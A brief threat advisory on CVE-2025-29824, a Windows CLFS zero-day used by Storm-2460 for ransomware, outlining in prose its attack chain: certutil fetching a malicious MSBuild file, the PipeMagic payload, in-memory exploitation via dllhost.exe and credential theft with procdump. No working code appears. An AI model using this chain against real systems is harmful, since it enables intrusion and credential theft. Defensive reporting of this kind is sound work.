Exploitation of CLFS Zero-Day Leads to Ransomware Activity

CVE‐2025‐29824 is a critical zero-day vulnerability in the Windows Common Log File System (CLFS) kernel driver. Under the category of threat details, this flaw enables local privilege escalation from a standard user account to SYSTEM. The vulnerability is currently being exploited in the wild by a financially motivated threat actor known to deploy ransomware, as described in the referenced blog. In terms of tactics observed, the threat group Storm‐2460 often begins the initial compromise using tools like certutil to download a malicious MSBuild file from a compromised third-party site. This file contains an encrypted malware payload called PipeMagic, which triggers the CLFS exploit in memory via dllhost.exe. Once exploitation is successful, the attacker uses procdump to extract credentials. Although Microsoft detected ransomware activity on affected systems, they were unable to obtain a ransomware sample for further analysis. The exploitation of this zero-day vulnerability represents a significant threat to Windows environments, as it allows attackers to gain the highest level of system privileges necessary for deploying ransomware and causing maximum damage to target organizations.